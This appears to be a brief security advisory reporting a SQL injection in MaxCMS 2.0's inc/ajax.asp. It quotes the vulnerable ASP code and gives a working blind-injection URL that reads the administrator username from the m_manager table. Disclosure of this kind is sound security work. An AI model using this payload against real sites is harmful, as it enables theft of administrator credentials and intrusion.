######################### Securitylab.ir ########################
# Application Info:
# Name: MaxCMS
# Version: 2.0
# web: http://maxcms.net
#################################################################
# Discoverd By: Securitylab.ir 
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
#===========================================================
#\inc\ajax.asp
#
#dim action : action = getForm("action", "get")
#response.Charset="gbk"
#
#Select  case action
#    case "newslist" : viewNewsList
#    case "newscontent" : viewNewsContent
#    case "digg","tread" : scoreVideo(action)
#    case "reporterr" : reportErr
#    case "hit" : updateHit
#    case else : main
#End Select
#terminateAllObjects
#
#http://site.com/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97
#===========================================================
##################################################################
# Securitylab Security Research Team , secu_lab_ir@yahoo.com
###################################################################